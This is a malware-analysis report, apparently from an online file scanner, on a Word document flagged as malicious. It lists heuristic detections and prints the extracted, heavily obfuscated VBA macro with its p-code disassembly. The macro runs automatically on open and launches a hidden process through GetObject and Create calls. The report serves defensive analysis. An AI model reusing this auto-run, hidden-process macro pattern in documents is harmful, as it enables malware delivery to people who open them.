MALICIOUS
190
Risk Score
Heuristics 7
-
ClamAV: Doc.Malware.00536d-6904394-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.00536d-6904394-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
Set cxkADA = GetObject(EAA1ADA + ToBQAQAU.TkBGQ4D + YA4XBkAA) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub autoopen() -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11061 bytes |
SHA-256: bf710a3c0af7008bfa17f5792ce7032636bf216319492bec6ea9f095c26fa470 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "iQAoZAAQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "ToBQAQAU"
Attribute VB_Base = "0{51E7B197-7237-49D0-8E12-9D4F33F51C38}{C1FE6852-1F98-4CBC-AA30-83EF6529269E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "F_AwBA"
Sub autoopen()
On Error Resume Next
If bUAGoZB = RAG1DoA Then
JACAxk = (710457559)
cA1AA_ = (wAkQxUA * Log(234176360 + Atn(265125248 * RABwQk)) + XUGkCAAx + CDbl(BQXXAC - Sqr(WAGQBAB / CBool(403487077 / 790890056) + rQwkQGoA - Rnd(BUDDXw))) * 764328624 * 109473798)
vUkGAwC = (119548777)
End If
If JA1cQAk = RADDAAAk Then
oDUBAQQw = (756835792)
TXAAwU = (bQZA_kQ * Log(563522477 + Atn(897508302 * wAGGCA_A)) + zADxBC + CDbl(WZAQQU - Sqr(wwUAwA / CBool(730548565 / 937442634) + kQkBQc - Rnd(bUkkAX))) * 182487739 * 545345512)
TAACUGUw = (719535755)
End If
Set cxkADA = GetObject(EAA1ADA + ToBQAQAU.TkBGQ4D + YA4XBkAA)
If H1xQcGA = PAUAUkQ1 Then
SkAB_B = (285702528)
z4DA_xQ = (r1k1AAA * Log(626390355 + Atn(149629213 * FQBcZkDU)) + wUxwAAC + CDbl(BCAA_xAD - Sqr(bBUBAUw / CBool(764558718 / 378496997) + jAABAB - Rnd(vBDQwU))) * 951609534 * 772194350)
z4ADAXU = (246719815)
End If
If jABcAX = AAAAAwo_ Then
R4oQAo = (665634783)
uDDcABD = (IAAkoB * Log(762470668 + Atn(212658891 * tAoCAk)) + NDDCADG + CDbl(hBcDQcA - Sqr(DwUAQxDD / CBool(215923357 / 76587700) + jBAAkkA - Rnd(kAo_kDQw))) * 332239278 * 433924401)
CAQoXAA = (600683028)
End If
If ZA_Dc1A = CQAxAAZA Then
KBDUAA = (768959014)
IAAc1B = (VCQGQA * Log(511043833 + Atn(158982383 * wGACUAB)) + VAADwUAU + CDbl(d4_UQDU - Sqr(hUBBAAQ / CBool(201061409 / 447957769) + Zk_A_AQB - Rnd(mQxA_o))) * 509950142 * 283120311)
AwUXABDB = (347885851)
End If
cxkADA.ShowWindow = 796713 - 796713
If dAAk1k = YDAZABxU Then
DZA_cCCQ = (400346871)
hAZUQAQ = (UBAAAZ1o * Log(795585158 + Atn(889226940 * p4BCDD)) + KQUZAAAB + CDbl(jZUwZZB4 - Sqr(hAAZXUo / CBool(554761292 / 643721005) + pABB4B - Rnd(q4_AAwAQ))) * 559988833 * 87661382)
nwAAAA = (195148856)
End If
If WXGUZD = IACcAB1 Then
wDxX_AAU = (321982358)
rCAo4DGX = (VZADCB * Log(801773299 + Atn(23713028 * FAA1ow)) + BZcXCUAw + CDbl(TUoDBA - Sqr(jkQ1DDQ / CBool(28398717 / 577525272) + BxUDUXAx - Rnd(jAADAAA))) * 226843297 * 7688389)
lAQBAAk = (629637192)
End If
GetObject(TXAAoXBA + ToBQAQAU.QBZDAZG + lUAoXwB). _
Create@ s1_1DUB + ToBQAQAU.aAAABC + WBGBxBwA + ToBQAQAU.P4A4AG + R_GAXG + ToBQAQAU.PDGQ1Gw + JocAwo, hAo1A1, cxkADA, LAcoGX
If zXcQGQD = wZA_QQG Then
hxAwUZG = (570384162)
F1AQUA = (M4wDUAA * Log(407835625 + Atn(304222552 * SB4AQAA)) + Y_oDAAAD + CDbl(RwGAAXUQ - Sqr(Y1XGcGA / CBool(488489582 / 230218335) + iZDAQU - Rnd(CkGBDAD))) * 682638485 * 314394870)
UUAA1X1X = (106574424)
End If
If qCXGGU = wDAUGQB Then
zGD4Bk = (932955277)
t_GUxA_G = (YABwAAxQ * Log(493076800 + Atn(720779727 * UUZxA_)) + qABUQ_o1 + CDbl(MxABAxU - Sqr(sBBADCGA / CBool(252109750 / 189680532) + zDQAX4 - Rnd(soAXC_AA))) * 548380720 * 474016275)
JUUAABX = (745664000)
End If
End Sub
' Processing file: /opt/analyzer/scan_staging/b848df5515584586877ea701ee417005.bin
' ===============================================================================
' Module streams:
' Macros/VBA/iQAoZAAQ - 1106 bytes
' Macros/VBA/ToBQAQAU - 1158 bytes
' Macros/VBA/F_AwBA - 5308 bytes
' Line #0:
' FuncDefn (Sub F_AwBA())
' Line #1:
' OnError (Resume Next)
' Line #2:
' Ld autoopen
' Ld bUAGoZB
' Eq
' IfBlock
' Line #3:
' LitDI4 0xB8D7 0x2A58
' Paren
' St RAG1DoA
' Line #4:
' Ld cA1AA_
' LitDI4 0x3F68 0x0DF5
' LitDI4 0x7D80 0x0FCD
' Ld wAkQxUA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld RABwQk
' Add
' Ld XUGkCAAx
' Ld BQXXAC
' LitDI4 0xB965 0x180C
' LitDI4 0x0648 0x2F24
' Div
' Coerce (Bool)
' Div
' Ld WAGQBAB
' Add
' Ld rQwkQGoA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xBAB0 0x2D8E
' Mul
' LitDI4 0x7006 0x0686
' Mul
' Add
' Paren
' St JACAxk
' Line #5:
' LitDI4 0x2B69 0x0720
' Paren
' St BUDDXw
' Line #6:
' EndIfBlock
' Line #7:
' Ld vUkGAwC
' Ld JA1cQAk
' Eq
' IfBlock
' Line #8:
' LitDI4 0x65D0 0x2D1C
' Paren
' St RADDAAAk
' Line #9:
' Ld TXAAwU
' LitDI4 0xABAD 0x2196
' LitDI4 0xE3CE 0x357E
' Ld bQZA_kQ
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld wAGGCA_A
' Add
' Ld zADxBC
' Ld WZAQQU
' LitDI4 0x4955 0x2B8B
' LitDI4 0x3D4A 0x37E0
' Div
' Coerce (Bool)
' Div
' Ld wwUAwA
' Add
' Ld kQkBQc
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x8ABB 0x0AE0
' Mul
' LitDI4 0x4FE8 0x2081
' Mul
' Add
' Paren
' St oDUBAQQw
' Line #10:
' LitDI4 0x3E8B 0x2AE3
' Paren
' St bUkkAX
' Line #11:
' EndIfBlock
' Line #12:
' SetStmt
' Ld GetObject
' Ld MSForms
' MemLd EAA1ADA
' Add
' Ld TkBGQ4D
' Add
' ArgsLd cxkADA 0x0001
' Set TAACUGUw
' Line #13:
' Ld YA4XBkAA
' Ld H1xQcGA
' Eq
' IfBlock
' Line #14:
' LitDI4 0x7980 0x1107
' Paren
' St PAUAUkQ1
' Line #15:
' Ld z4DA_xQ
' LitDI4 0xF553 0x2555
' LitDI4 0x291D 0x08EB
' Ld r1k1AAA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld FQBcZkDU
' Add
' Ld wUxwAAC
' Ld BCAA_xAD
' LitDI4 0x3D7E 0x2D92
' LitDI4 0x67E5 0x168F
' Div
' Coerce (Bool)
' Div
' Ld bBUBAUw
' Add
' Ld jAABAB
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x68BE 0x38B8
' Mul
' LitDI4 0xC02E 0x2E06
' Mul
' Add
' Paren
' St SkAB_B
' Line #16:
' LitDI4 0xA547 0x0EB4
' Paren
' St vBDQwU
' Line #17:
' EndIfBlock
' Line #18:
' Ld z4ADAXU
' Ld jABcAX
' Eq
' IfBlock
' Line #19:
' LitDI4 0xC7DF 0x27AC
' Paren
' St AAAAAwo_
' Line #20:
' Ld uDDcABD
' LitDI4 0x610C 0x2D72
' LitDI4 0xEACB 0x0CAC
' Ld IAAkoB
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld tAoCAk
' Add
' Ld NDDCADG
' Ld hBcDQcA
' LitDI4 0xBA9D 0x0CDE
' LitDI4 0xA2B4 0x0490
' Div
' Coerce (Bool)
' Div
' Ld DwUAQxDD
' Add
' Ld jBAAkkA
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x91AE 0x13CD
' Mul
' LitDI4 0x2931 0x19DD
' Mul
' Add
' Paren
' St R4oQAo
' Line #21:
' LitDI4 0xB214 0x23CD
' Paren
' St kAo_kDQw
' Line #22:
' EndIfBlock
' Line #23:
' Ld CAQoXAA
' Ld ZA_Dc1A
' Eq
' IfBlock
' Line #24:
' LitDI4 0x6226 0x2DD5
' Paren
' St CQAxAAZA
' Line #25:
' Ld IAAc1B
' LitDI4 0xE8F9 0x1E75
' LitDI4 0xE0EF 0x0979
' Ld VCQGQA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld wGACUAB
' Add
' Ld VAADwUAU
' Ld d4_UQDU
' LitDI4 0xF421 0x0BFB
' LitDI4 0x4B09 0x1AB3
' Div
' Coerce (Bool)
' Div
' Ld hUBBAAQ
' Add
' Ld Zk_A_AQB
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x38BE 0x1E65
' Mul
' LitDI4 0x12B7 0x10E0
' Mul
' Add
' Paren
' St KBDUAA
' Line #26:
' LitDI4 0x511B 0x14BC
' Paren
' St mQxA_o
' Line #27:
' EndIfBlock
' Line #28:
' LitDI4 0x2829 0x000C
' LitDI4 0x2829 0x000C
' Sub
' Ld TAACUGUw
' MemSt AwUXABDB
' Line #29:
' Ld ShowWindow
' Ld dAAk1k
' Eq
' IfBlock
' Line #30:
' LitDI4 0xCEF7 0x17DC
' Paren
' St YDAZABxU
' Line #31:
' Ld hAZUQAQ
' LitDI4 0xAA86 0x2F6B
' LitDI4 0x86BC 0x3500
' Ld UBAAAZ1o
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld p4BCDD
' Add
' Ld KQUZAAAB
' Ld jZUwZZB4
' LitDI4 0xFC4C 0x2110
' LitDI4 0x672D 0x265E
' Div
' Coerce (Bool)
' Div
' Ld hAAZXUo
' Add
' Ld pABB4B
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xC061 0x2160
' Mul
' LitDI4 0x9B46 0x0539
' Mul
' Add
' Paren
' St DZA_cCCQ
' Line #32:
' LitDI4 0xBC38 0x0BA1
' Paren
' St q4_AAwAQ
' Line #33:
' EndIfBlock
' Line #34:
' Ld nwAAAA
' Ld WXGUZD
' Eq
' IfBlock
' Line #35:
' LitDI4 0x0F96 0x1331
' Paren
' St IACcAB1
' Line #36:
' Ld rCAo4DGX
' LitDI4 0x16F3 0x2FCA
' LitDI4 0xD504 0x0169
' Ld VZADCB
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld FAA1ow
' Add
' Ld BZcXCUAw
' Ld TUoDBA
' LitDI4 0x547D 0x01B1
' LitDI4 0x5618 0x226C
' Div
' Coerce (Bool)
' Div
' Ld jkQ1DDQ
' Add
' Ld BxUDUXAx
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x5AA1 0x0D85
' Mul
' LitDI4 0x50C5 0x0075
' Mul
' Add
' Paren
' St wDxX_AAU
' Line #37:
' LitDI4 0x8048 0x2587
' Paren
' St jAADAAA
' Line #38:
' EndIfBlock
' Line #39:
' LineCont 0x0004 0B 00 00 00
' Ld Create
' Ld MSForms
' MemLd s1_1DUB
' Add
' Ld aAAABC
' Add
' Ld MSForms
' MemLd WBGBxBwA
' Add
' Ld P4A4AG
' Add
' Ld MSForms
' MemLd R_GAXG
' Add
' Ld PDGQ1Gw
' Add
' Ld JocAwo
' Ld TAACUGUw
' Ld hAo1A1
' Ld lAQBAAk
' Ld MSForms
' MemLd TXAAoXBA
' Add
' Ld QBZDAZG
' Add
' ArgsLd cxkADA 0x0001
' ArgsMemCall lUAoXwB@ 0x0004
' Line #40:
' Ld LAcoGX
' Ld zXcQGQD
' Eq
' IfBlock
' Line #41:
' LitDI4 0x5F22 0x21FF
' Paren
' St wZA_QQG
' Line #42:
' Ld F1AQUA
' LitDI4 0x13E9 0x184F
' LitDI4 0x1158 0x1222
' Ld M4wDUAA
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld SB4AQAA
' Add
' Ld Y_oDAAAD
' Ld RwGAAXUQ
' LitDI4 0xC26E 0x1D1D
' LitDI4 0xDA5F 0x0DB8
' Div
' Coerce (Bool)
' Div
' Ld Y1XGcGA
' Add
' Ld iZDAQU
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0x3C95 0x28B0
' Mul
' LitDI4 0x48F6 0x12BD
' Mul
' Add
' Paren
' St hxAwUZG
' Line #43:
' LitDI4 0x3258 0x065A
' Paren
' St CkGBDAD
' Line #44:
' EndIfBlock
' Line #45:
' Ld UUAA1X1X
' Ld qCXGGU
' Eq
' IfBlock
' Line #46:
' LitDI4 0xC48D 0x379B
' Paren
' St wDAUGQB
' Line #47:
' Ld t_GUxA_G
' LitDI4 0xC140 0x1D63
' LitDI4 0x39CF 0x2AF6
' Ld YABwAAxQ
' Mul
' ArgsLd Atn 0x0001
' Add
' ArgsLd Log 0x0001
' Mul
' Ld UUZxA_
' Add
' Ld qABUQ_o1
' Ld MxABAxU
' LitDI4 0xE3B6 0x0F06
' LitDI4 0x4B94 0x0B4E
' Div
' Coerce (Bool)
' Div
' Ld sBBADCGA
' Add
' Ld zDQAX4
' ArgsLd Rnd 0x0001
' Sub
' ArgsLd Sqr 0x0001
' Sub
' Coerce (Dbl)
' LitDI4 0xA030 0x20AF
' Mul
' LitDI4 0xEA13 0x1C40
' Mul
' Add
' Paren
' St zGD4Bk
' Line #48:
' LitDI4 0xEE00 0x2C71
' Paren
' St soAXC_AA
' Line #49:
' EndIfBlock
' Line #50:
' EndSub
' Line #51:
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.